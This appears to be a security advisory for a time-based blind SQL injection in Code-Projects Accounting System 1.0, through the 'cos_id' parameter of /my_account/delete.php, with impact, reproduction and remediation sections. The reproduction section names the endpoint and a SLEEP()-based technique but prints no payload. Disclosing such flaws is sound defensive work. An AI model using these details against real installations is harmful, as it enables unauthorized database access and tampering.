Code-Projects Accounting System SQL Injection Vulnerability in Delete Function

A time-based blind SQL injection vulnerability has been identified in Code-Projects Accounting System version 1.0. The issue arises in the delete.php file within the 'my_account' directory, specifically through the 'cos_id' parameter. The vulnerability allows remote attackers to inject malicious SQL payloads, exploiting the application's failure to properly validate and sanitize user input before it is executed in SQL queries. This flaw could lead to unauthorized database access and manipulation.

Impact

Exploitation of this vulnerability could allow attackers to execute arbitrary SQL commands, potentially leading to unauthorized data access, data manipulation, or even administrative access within the application.

Reproduction

To reproduce this vulnerability, send a GET request to '/my_account/delete.php' with a crafted 'cos_id' parameter that includes a SQL injection payload designed to exploit the application's SQL query handling. The injected payload can use database functions like SLEEP() to create a delay, confirming the successful execution of the injected SQL code.

Remediation

It is recommended to use prepared statements for SQL queries to prevent injection vulnerabilities. Additionally, all user input should be validated and sanitized before processing. Implementing security monitoring and using database accounts with minimal privileges can also help mitigate potential risks.